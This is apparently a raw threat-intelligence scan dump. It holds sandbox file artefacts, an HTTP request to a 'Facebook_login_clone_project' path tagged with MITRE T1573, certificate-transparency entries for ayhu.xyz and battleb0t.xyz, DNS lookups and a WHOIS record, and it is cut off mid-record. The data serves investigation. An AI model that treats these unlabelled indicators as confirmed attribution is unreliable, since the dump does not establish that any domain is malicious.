"~DFA29BB38809160733.TMP" has type "data"- Location: [%TEMP%\\~DFA29BB38809160733.TMP]- [targetUID: 00000000-00003444]\n "PHD1U0AR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PHD1U0AR.txt]- [targetUID: 00000000-00003444]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "3SZP8PGX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3SZP8PGX.txt]- [targetUID: 00000000-00003444]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003444]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002884]\n "_5CFD1796-A009-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "fblogo_1_.png" has type "PNG image data 512 x 512 8-bit colormap non-interlaced"- [targetUID: N/A]\n "RecoveryStore._8BEC63F7-A007-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_8BEC63F9-A007-11ED-9493-080027E9E15B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /Facebook_login_clone_project HTTP/1.1\nAccept | 185.199.111.153 |
| 2023-05-12 02:57:33 | Raw Data from RIRs | No | Certificate Transparency | 8 | 0 | 1 | 0 | None | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] | ayhu.xyz |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-109-153.github.com | 185.199.109.153 |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000yesnt.github.io |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 72.170.74.34.bc.googleusercontent.com | 34.74.170.72 |
| 2023-05-12 02:44:20 | Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@support.gandi.net | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS 